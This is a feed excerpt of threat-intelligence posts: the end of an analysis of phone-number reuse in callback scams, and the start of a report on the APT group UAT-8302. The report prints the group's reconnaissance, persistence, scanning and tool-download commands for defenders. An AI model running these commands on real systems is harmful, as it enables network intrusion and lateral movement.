<table class="MsoNormalTable" border="0" cellspacing="0" cellpadding="0" width="624" style="caret-color: rgb(0, 0, 0); color: rgb(0, 0, 0); font-style: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-line: none; text-decoration-thickness: auto; text-decoration-style: solid; width: 6.5in; border-collapse: collapse;"><tbody><tr style="height: 35.25pt;"><td width="204" valign="top" style="width: 153pt; padding: 0in 5.4pt; height: 35.25pt;"><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;"><b>Claimed business context<o:p></o:p></b></p></td><td width="119" valign="top" style="width: 89.25pt; padding: 0in 5.4pt; height: 35.25pt;"><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;"><b>Psychological trigger<o:p></o:p></b></p></td><td width="151" valign="top" style="width: 113.25pt; padding: 0in 5.4pt; height: 35.25pt;"><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;"><b>Call-to-action<o:p></o:p></b></p></td><td width="150" valign="top" style="width: 112.5pt; padding: 0in 5.4pt; height: 35.25pt;"><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;"><b>Impersonated brand<o:p></o:p></b></p></td></tr><tr style="height: 15pt;"><td width="204" valign="top" style="width: 153pt; padding: 0in 5.4pt; height: 15pt;"><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;">Subscription renewal<o:p></o:p></p><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;">Invoice or billing statement<o:p></o:p></p><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;">Account security alert<o:p></o:p></p><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;">Order confirmation/shipping issue<o:p></o:p></p><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;">Technical support case<o:p></o:p></p><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;">Refund or overpayment notice<o:p></o:p></p><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;">Service cancelation confirmation<o:p></o:p></p><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;">Financial transaction verification<o:p></o:p></p></td><td width="119" valign="top" style="width: 89.25pt; padding: 0in 5.4pt; height: 15pt;"><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;">Urgency<o:p></o:p></p><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;">Fear/Loss aversion<o:p></o:p></p><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;">Confusion<o:p></o:p></p><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;">Relief opportunity<o:p></o:p></p><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;">Curiosity<o:p></o:p></p></td><td width="151" valign="top" style="width: 113.25pt; padding: 0in 5.4pt; height: 15pt;"><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;">Call a phone number<o:p></o:p></p><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;">Click a link<o:p></o:p></p><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;">Reply with personal details<span class="Apple-converted-space">&#xA0;</span><o:p></o:p></p><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;">Download/open attachment<span class="Apple-converted-space">&#xA0;</span><o:p></o:p></p><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;">Provide payment/banking information<o:p></o:p></p></td><td width="150" valign="top" style="width: 112.5pt; padding: 0in 5.4pt; height: 15pt;"><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;">PayPal<span class="Apple-converted-space">&#xA0;</span><o:p></o:p></p><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;">Geek Squad (Best Buy)<span class="Apple-converted-space">&#xA0;</span><o:p></o:p></p><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;">McAfee<span class="Apple-converted-space">&#xA0;</span><o:p></o:p></p><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;">Norton LifeLock<o:p></o:p></p><p class="MsoNormal" style="margin: 0in 0in 8pt; line-height: 18.559999px; font-size: 12pt; font-family: Aptos, sans-serif;"><o:p>&#xA0;</o:p></p></td></tr></tbody></table>
<!--kg-card-end: html-->
<p><em>Table 1. Examples of lures that most commonly appear in&#xA0;scam&#xA0;or phishing emails.</em></p><p>We&#xA0;observed&#xA0;phone numbers being recycled across diverse,&#xA0;seemingly unrelated&#xA0;lures:&#xA0;</p><ul><li><strong>Using the same phone number across multiple lures in the subject line:</strong> In one campaign, a single phone number appeared across multiple business contexts, such as &quot;order confirmation&quot; and &quot;financial transaction verification.&quot; Figure 6 demonstrates how these subject lines differ, despite the emails containing the same phone number and impersonating the same brand.</li></ul><figure class="kg-card kg-gallery-card kg-width-wide kg-card-hascaption"><div class="kg-gallery-container"><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/Figure_6a.png" width="1365" height="1929" loading="lazy" alt="Insights into the clustering and reuse of phone numbers in scam emails" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/Figure_6a.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/05/Figure_6a.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/Figure_6a.png 1365w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/Figure_6b.png" width="1361" height="1779" loading="lazy" alt="Insights into the clustering and reuse of phone numbers in scam emails" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/Figure_6b.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/05/Figure_6b.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/Figure_6b.png 1361w" sizes="(min-width: 720px) 720px"></div></div><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/Figure_6c.png" width="1358" height="1672" loading="lazy" alt="Insights into the clustering and reuse of phone numbers in scam emails" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/Figure_6c.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/05/Figure_6c.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/Figure_6c.png 1358w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/Figure_6d.png" width="1360" height="1742" loading="lazy" alt="Insights into the clustering and reuse of phone numbers in scam emails" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/Figure_6d.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/05/Figure_6d.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/Figure_6d.png 1360w" sizes="(min-width: 720px) 720px"></div></div></div><figcaption><p><span style="white-space: pre-wrap;">Figure&#xA0;6.&#xA0;Four scam emails with completely different subject lines&#xA0;that&#xA0;contain the same phone number.</span></p></figcaption></figure><ul><li><strong>Using the same phone number across multiple</strong>&#xA0;<strong>document-based</strong>&#xA0;<strong>lures</strong>: In a second campaign, a single phone number was embedded in PDF attachments used for both&#xA0;&#x201C;subscription renewal&#x201D;&#xA0;and&#xA0;&#x201C;financial transaction verification.&#x201D;Interestingly, this campaign&#xA0;utilized&#xA0;two&#xA0;different brands&#xA0;&#x2014;&#xA0;PayPal and Norton LifeLock&#xA0;&#x2014;&#xA0;to redirect recipients to the same call center,&#xA0;leveraging&#xA0;urgency as a psychological trigger.</li></ul><figure class="kg-card kg-gallery-card kg-width-wide kg-card-hascaption"><div class="kg-gallery-container"><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/Figure_7a.png" width="1427" height="1927" loading="lazy" alt="Insights into the clustering and reuse of phone numbers in scam emails" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/Figure_7a.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/05/Figure_7a.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/Figure_7a.png 1427w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/Figure_7b.png" width="1112" height="1748" loading="lazy" alt="Insights into the clustering and reuse of phone numbers in scam emails" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/Figure_7b.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/05/Figure_7b.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/Figure_7b.png 1112w" sizes="(min-width: 720px) 720px"></div></div></div><figcaption><p><span style="white-space: pre-wrap;">Figure&#xA0;7. Two&#xA0;scam&#xA0;emails with different body contents that&#xA0;contain&#xA0;the same phone number&#xA0;while&#xA0;impersonating&#xA0;different brands.</span></p></figcaption></figure><ul><li><strong>Using the same phone number across multiple attachment file formats: </strong>In a third campaign, a single phone number was embedded in two different attachment formats: HEIC and JPEG. The use of HEIC (High Efficiency Image Container) &#x2014; a format often used for iPhone/iPad photos &#x2014; demonstrates the attackers&apos; efforts to bypass traditional file-based detection while maintaining high image quality. Talos has observed campaigns utilizing even more attachment types, confirming that threat actors frequently distribute a single phone number across multiple attack vectors to maximize their reach.</li></ul><figure class="kg-card kg-gallery-card kg-width-wide kg-card-hascaption"><div class="kg-gallery-container"><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/Figure_8a.png" width="2000" height="1534" loading="lazy" alt="Insights into the clustering and reuse of phone numbers in scam emails" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/Figure_8a.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/05/Figure_8a.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/05/Figure_8a.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w2400/2026/05/Figure_8a.png 2400w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/Figure_8b.png" width="2000" height="1456" loading="lazy" alt="Insights into the clustering and reuse of phone numbers in scam emails" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/Figure_8b.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/05/Figure_8b.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/05/Figure_8b.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w2400/2026/05/Figure_8b.png 2400w" sizes="(min-width: 720px) 720px"></div></div></div><figcaption><p><span style="white-space: pre-wrap;">Figure&#xA0;8. Two&#xA0;scam&#xA0;emails with different attachment file types that&#xA0;contain&#xA0;the same phone number&#xA0;while&#xA0;impersonating&#xA0;the same brand.</span></p></figcaption></figure><h2 id="phone-block-level-clustering">Phone block-level clustering&#xA0;</h2><p>In the context of&#xA0;scam&#xA0;emails and related smishing or callback&#xA0;scams, attackers&#xA0;utilize&#xA0;specific VoIP grouping and clustering techniques to bypass security filters, appear legitimate, and&#xA0;maintain&#xA0;high-volume operations. One of the most common tactics is sequential number grouping. Scammers often obtain large ranges of sequential phone numbers by&#xA0;purchasing&#xA0;Direct Inward Dialing (DID) blocks. Consequently, if a specific number is flagged as spam and blocked by a carrier, the attackers simply rotate to the next number in the block.&#xA0;</p><p>The figure below&#xA0;shows&#xA0;how a block of numbers&#xA0;&#x2014;&#xA0;differing only in the last four digits&#xA0;&#x2014;&#xA0;is used in various&#xA0;scam&#xA0;emails impersonating PayPal between March 3 and March 6, 2026. It is also&#xA0;clear&#xA0;that certain numbers are used in larger campaigns than others; for instance,&#xA0;&#x201C;+1&#xA0;804[-]713[-]4598&#x201D;&#xA0;was used in 117&#xA0;scam&#xA0;emails in a single day.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/Figure_9-2.png" class="kg-image" alt="Insights into the clustering and reuse of phone numbers in scam emails" loading="lazy" width="1202" height="764" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/Figure_9-2.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/05/Figure_9-2.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/Figure_9-2.png 1202w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure&#xA0;9. Example of sequential phone numbers used in&#xA0;scam&#xA0;emails impersonating one specific brand.</span></figcaption></figure><p>In large-scale&#xA0;scam&#xA0;campaigns, phone numbers within a single sequential block are reused across multiple brand lures. The figure below shows how a range of numbers in a sequential block is deployed across three different brand lures. As with the&#xA0;previous&#xA0;case, some phone numbers are&#xA0;utilized&#xA0;in significantly larger campaign volumes than others.</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/Figure_10-2.png" class="kg-image" alt="Insights into the clustering and reuse of phone numbers in scam emails" loading="lazy" width="1038" height="1184" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/Figure_10-2.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/05/Figure_10-2.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/Figure_10-2.png 1038w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Figure&#xA0;10. Example of sequential phone numbers used in&#xA0;scam&#xA0;emails impersonating multiple brands.</span></figcaption></figure><h2 id="conclusion-and-protection">Conclusion and&#xA0;protection&#xA0;</h2><p>When tracking&#xA0;scam&#xA0;campaigns, it is essential to look beyond individual sender email addresses, which are often ephemeral. Instead, it is more strategic to focus on phone numbers, which serve as the true anchors of the operation. By clustering&#xA0;scam&#xA0;lures based on shared phone numbers, security researchers can effectively map connections between&#xA0;seemingly unrelated&#xA0;campaigns,&#xA0;ultimately exposing&#xA0;the infrastructure of organized criminal call centers.&#xA0;</p><p>Service providers and security teams should prioritize the implementation of real-time reputation monitoring for different communication channels to proactively mitigate these threats. For example,&#xA0;establishing&#xA0;centralized databases that track and flag high-risk phone numbers across multiple platforms allows for rapid cross-campaign correlation. Collaboration between telecommunications and VoIP providers is also vital, as sharing threat intelligence&#xA0;regarding&#xA0;malicious telephony infrastructure enables an industry-wide defense against the persistent threat of social engineering and fraud.&#xA0;</p><h2 id="cisco-secure-email-threat-defense">Cisco Secure Email Threat Defense&#xA0;</h2><p>Protecting against these sophisticated and devious threats requires a comprehensive email security solution that harnesses AI-powered detections. Cisco Secure Email Threat Defense utilizes unique deep and machine learning models, including Natural Language Processing, in its advanced threat detection systems that leverage multiple engines. These simultaneously evaluate different portions of an incoming email to uncover known, emerging, and targeted threats.</p><p>Secure Email Threat Defense&#xA0;identifies&#xA0;malicious techniques used in attacks targeting your organization, derives unparalleled context for specific business risks, provides searchable threat telemetry, and categorizes threats to understand which parts of your organization are most vulnerable to attack.&#xA0;You can sign up for a&#xA0;<a href="https://www.cisco.com/c/en/us/products/security/email-threat-defense-free-trial.html" rel="noreferrer noopener"><u>free trial</u></a>&#xA0;of Email Threat Defense today.&#xA0;</p>]]></content:encoded></item><item><title><![CDATA[UAT-8302 and its box full of malware]]></title><description><![CDATA[Cisco Talos is disclosing UAT-8302, a sophisticated, China-nexus advanced persistent threat (APT) group targeting government entities in South America since at least late 2024 and government agencies in southeastern Europe in 2025.]]></description><link>https://blog.talosintelligence.com/uat-8302/</link><guid isPermaLink="false">69f8b366594fe5000138101e</guid><category><![CDATA[APT]]></category><category><![CDATA[Threat Spotlight]]></category><category><![CDATA[Cisco Talos Malware Protection]]></category><category><![CDATA[Cisco Talos Network Intrusion Prevention]]></category><category><![CDATA[Cisco Talos Web Filtering]]></category><category><![CDATA[Cisco Talos Antivirus]]></category><dc:creator><![CDATA[Jungsoo An]]></dc:creator><pubDate>Tue, 05 May 2026 10:00:30 GMT</pubDate><media:content url="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/UAT-8302.png" medium="image"/><content:encoded><![CDATA[<ul><li>Cisco Talos is disclosing UAT-8302, a sophisticated, China-nexus advanced persistent threat (APT) group targeting government entities in South America since at least late 2024 and government agencies in southeastern Europe in 2025.</li><li>After successful compromises, UAT-8302 deploys multiple custom-made malware families that have previously been used by other known China-nexus threat actors.</li><li>Talos discovered a .NET-based backdoor we track as &#x201C;NetDraft&#x201D; that is a C#-based variant of the FinalDraft/SquidDoor malware family developed and operated by <a href="https://www.security.com/threat-intelligence/jewelbug-apt-russia">Jewelbug</a>/<a href="https://www.elastic.co/security-labs/fragile-web-ref7707">REF7707</a>/<a href="https://unit42.paloaltonetworks.com/advanced-backdoor-squidoor/">CL-STA-0049</a>/<a href="https://www.welivesecurity.com/en/eset-research/longnosedgoblin-tries-sniff-out-governmental-affairs-southeast-asia-japan/">LongNosedGoblin</a>, a cluster of China-nexus APT actors.</li><li>Furthermore, UAT-8302 also uses an updated version of the <a href="https://securelist.com/eastwind-apt-campaign/113345/">CloudSorcerer backdoor</a>, a malware family used in attacks against Russian government entities in 2024.</li><li>UAT-8302 also used VSHELL and its SNOWLIGHT stager in their operations, along with a new Rust-based stager that we track as SNOWRUST.</li></ul><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/UAT-8302.png" alt="UAT-8302 and its box full of malware"><p>Talos assesses with high confidence that UAT-8302 is a China-nexus advanced persistent threat (APT) group tasked primarily with obtaining and maintaining long-term access to government and related entities around the world.</p><p>Post-compromise activity consisted of information collection, credential extraction, and proliferation using open-source tooling such as Impacket, proxying tools, and custom-built malware.</p><p>Malware deployed by UAT-8302 connects it to several previously publicly disclosed threat clusters, indicating a close operating relationship between them at the very least. Overall, the various malicious artifacts deployed by UAT-8302 indicate that the group has access to tools used by other sophisticated APT actors, all of which have been assessed as China-nexus or Chinese-speaking by various third-party industry reports.</p><p>For instance, NetDraft, a .NET-based malware family deployed by UAT-8302 in South America, was also disclosed by ESET as NosyDoor, attributed to a China-nexus APT they track as <a href="https://www.welivesecurity.com/en/eset-research/longnosedgoblin-tries-sniff-out-governmental-affairs-southeast-asia-japan/">LongNosedGoblin. ESET assesses that LongNosedGoblin</a> used NosyDoor/NetDraft and other custom-made malware to target government organizations in Southeast Asia and Japan. Furthermore, as per <a href="https://rt-solar.ru/solar-4rays/blog/5603/">Solar&#x2019;s reporting</a>, NetDraft was also deployed against Russian IT organizations in 2024 by Erudite Mogwai (LuckyStrike Agent).</p><p>NetDraft is likely a .NET-ported variant of the FinalDraft/SquidDoor malware family developed and operated exclusively by <a href="https://www.security.com/threat-intelligence/jewelbug-apt-russia">Jewelbug</a>/<a href="https://www.elastic.co/security-labs/fragile-web-ref7707">REF7707</a>/<a href="https://unit42.paloaltonetworks.com/advanced-backdoor-squidoor/">CL-STA-0049</a> &#x2014; also another cluster of China-nexus APT actors.</p><p>Another malware family deployed by UAT-8302 is CloudSorcerer (version 3). <a href="https://securelist.com/cloudsorcerer-new-apt-cloud-actor/113056/">Kaspersky</a> disclosed that <a href="https://securelist.com/eastwind-apt-campaign/113345/">CloudSorcerer</a> was used in attacks directed against Russian government entities in 2024.</p><p>Furthermore, two other malware families, <a href="https://www.trendmicro.com/en_us/research/24/k/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-o.html">SNAPPYBEE/DeedRAT</a> and <a href="https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html">ZingDoor</a>, were deployed by UAT-8302 in conjunction with each other, a tactic also highlighted by <a href="https://www.trendmicro.com/en_us/research/24/k/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-o.html">Trend Micro</a> in 2024.</p><p>Talos&#x2019; analysis also connects more custom-made tooling that UAT-8302 used to other China-nexus or Chinese-speaking APTs:</p><ul><li>Draculoader: A generic shellcode loader deployed by UAT-8302, also used by the <a href="https://www.trendmicro.com/en_us/research/25/j/premier-pass-as-a-service.html">Earth Estries and Earth Naga</a> APT groups who have histories of targeting government agencies in Southeast Asia and elsewhere.</li><li>SNOWLIGHT: A generic stager for the VSHELL malware family, used by UAT-8302. Also used by <a href="https://blog.talosintelligence.com/uat-6382-exploits-cityworks-vulnerability/">UAT-6382, who exploited a Cityworks zero-day</a> (CVE-2025-0994) to deploy VSHELL. SNOWLIGHT has also been seen in intrusions attributed to other China-nexus APT clusters, such as <a href="https://cloud.google.com/blog/topics/threat-intelligence/initial-access-brokers-exploit-f5-screenconnect">UNC5174</a> and <a href="https://cloud.google.com/blog/topics/threat-intelligence/threat-actors-exploit-react2shell-cve-2025-55182">UNC6586</a>.</li></ul><p>The various connections between UAT-8302 and other China-nexus or Chinese-speaking threat actors can be visualized as:</p><figure class="kg-card kg-image-card"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-05be427b-88d2-4272-8a70-c32cbabaebb5.jpeg" class="kg-image" alt="UAT-8302 and its box full of malware" loading="lazy" width="936" height="779" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/data-src-image-05be427b-88d2-4272-8a70-c32cbabaebb5.jpeg 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/data-src-image-05be427b-88d2-4272-8a70-c32cbabaebb5.jpeg 936w" sizes="(min-width: 720px) 720px"></figure><p><em>Figure 1. UAT-8302&apos;s interconnections.</em></p><h2 id="initial-compromise-and-reconnaissance">Initial compromise and reconnaissance</h2><p>UAT-8302&apos;s tooling overlaps with various APT groups that have been known to exploit both zero-day and n-day exploits to obtain initial access. We assess that UAT-8302 follows the same paradigm of obtaining initial access to its victims.</p><p>Once initial access is obtained, UAT-8302 conducts preliminary reconnaissance using red-teaming tools such as Impacket:</p><figure class="kg-card kg-image-card"><img src="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/carbon-1-.png" class="kg-image" alt="UAT-8302 and its box full of malware" loading="lazy" width="1750" height="388" srcset="https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w600/2026/05/carbon-1-.png 600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1000/2026/05/carbon-1-.png 1000w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/size/w1600/2026/05/carbon-1-.png 1600w, https://storage.ghost.io/c/af/a0/afa04ee3-414f-4481-8d23-7e7c146f192e/content/images/2026/05/carbon-1-.png 1750w" sizes="(min-width: 720px) 720px"></figure><p>Other reconnaissance commands may be:</p>
<!--kg-card-begin: html-->
<pre>
ipconfig /all
certutil -user -store My
certutil -user -store CA
certutil -user -store Root
whoami
nslookup www[.]google[.]com
net use
cmd.exe /c net view /domain
cmd.exe /c systeminfo
cmd.exe /c net time /domain
cmd.exe /c nslookup -type=SRV _ldap._tcp
net group &lt;name&gt; /domain
</pre>
<!--kg-card-end: html-->
<p>&#xA0;One of UAT-8302&apos;s primary goals is to proliferate within the compromised network, and therefore, the actor conducts extensive reconnaissance on every endpoint that they can access. This extended recon is scripted usually using a custom-made PowerShell script such as &#x201C;whatpc.ps1&#x201D;:</p>
<!--kg-card-begin: html-->
<pre>
powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Windows\Temp\whatpc.ps1
</pre>
<!--kg-card-end: html-->
<p>The script may be persisted to collect system information via a scheduled task:</p>
<!--kg-card-begin: html-->
<pre>
cmd.exe /c schtasks /create /tn &apos;ReconLiteDebug&apos; /tr &apos;powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File c:\windows\temp\whatpc.ps1&apos; /sc ONCE /st 08:25 /ru SYSTEM /f

cmd.exe /c schtasks /create /tn &apos;RunWhatPC&apos; /tr &apos;c:\windows\temp\run.bat&apos; /sc ONCE /st 23:28 /ru SYSTEM /f
</pre>
<!--kg-card-end: html-->
<p>This script executes the following commands on the systems to identify them:</p>
<!--kg-card-begin: html-->
<pre>
whoami 
whoami.exe /groups
whoami.exe /priv
net.exe user
net.exe localgroup
net.exe localgroup administrators
ipconfig.exe /all
ARP.EXE -a
ROUTE.EXE print
NETSTAT.EXE -ano
cmd.exe /c net share
cmd.exe /c wmic startup get caption,command 2&gt;&amp;1
nltest.exe /dclist:&lt;domain&gt;
net.exe user /domain
net.exe group /domain
net.exe group Domain Admins /domain
nltest.exe /domain_trusts
</pre>
<!--kg-card-end: html-->
<p>UAT-8302 also performs ping sweeps of the network to discover more endpoints to proliferate into:</p>
<!--kg-card-begin: html-->
<pre>
C:/Windows/Temp/ping_scan.bat
C:/Windows/Temp/run_scan.bat
C:/Windows/Temp/nbtscan.exe

cmd.exe /Q /c (for /l %i in (1,1,254) do @ping -n 1 -w 300 192.168.1.%i | find TTL= &amp;&amp; echo 192.168.1.%i is alive) &gt; C:\Windows\Temp\alive_hosts.txt
</pre>
<!--kg-card-end: html-->
<p>UAT-8302 also discovers SMB shares in the network to find reachable remote shares:</p>
<!--kg-card-begin: html-->
<pre>
cmd.exe /Q /c (for /l %i in (1,1,254) do @net use \\192.168.1.%i\IPC$ &gt;nul 2&gt;&amp;1 &amp;&amp; echo 192.168.1.%i - Port 445 is open || echo 192.168.1.%i - Port 445 is closed) &gt; C:\Windows\Temp\portscan.txt
</pre>
<!--kg-card-end: html-->
<h3 id="scanning-tools">Scanning tools</h3><p>UAT-8302 may also download and run &#x201C;<a href="https://github.com/chainreactors/gogo">gogo</a>,&#x201D; a GoLang based, open-sourced automated network scanning engine written in Simplified Chinese:</p>
<!--kg-card-begin: html-->
<pre>
curl -fsSL hxxps://github[.]com/chainreactors/gogo/releases/download/v2.14.0/gogo_windows_amd64.exe -o go.exe
</pre>
